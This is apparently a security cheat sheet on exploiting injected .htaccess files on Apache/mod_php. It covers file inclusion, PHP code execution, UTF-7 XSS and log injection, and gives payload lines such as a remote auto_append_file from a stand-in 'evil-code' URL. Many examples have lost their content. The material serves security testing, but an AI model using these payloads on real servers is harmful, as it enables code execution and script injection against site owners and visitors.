Link to this headingPHP htacess
In a setup of Apache/mod_php an attacker is able to inject .htaccess (or php.ini or apache configuration). The injection directory has AllowOverride Options set (or AllowOverride All, which is very common as well).
Link to this headingExamples
Link to this headingExample 1a: file inclusion
index.php: (empty)
.htaccess:
Link to this headingExample 1b: PHP code execution
index.php: (empty)
.htaccess:
#<?php phpinfo();
Link to this headingExample 1c: (direct/remote) file inclusion
index.php: (empty)
.htaccess:
;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://example.com/evil-code.txt
Link to this headingExample 1d: XSS and PHP code execution with UTF-7
index.php: (empty)
.htaccess:
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+ADs
Link to this headingExample 2a: XSS via error message link
index.php: (produces error message)
.htaccess:
Link to this headingExample 2b: XSS via error message link extension
index.php:
.htaccess:
Link to this headingExample 3a: XSS via phps color
Assumtion: phps source handler is activated.
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
Order Allow,Deny
Allow from all
index.phps:
.htaccess:
Link to this headingExample 3b: XSS via highlight_file() color
index.php:
.htaccess:
Link to this headingExample 4a: failed PHP injection via error_log and include_path
In this example PHP correctly encodes HTML entities in log messages. The injection fails.
index.php:
.htaccess:
Link to this headingExample 4b: failed PHP injection via error_log and auto_prepend_file
index.php: (empty)
.htaccess:
Link to this headingExample 4c: PHP code injection via error_log and UTF-7
index.php: (empty)
.htaccess:
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
Link to this headingExample 6: Source code disclosure
index.php:
.htaccess: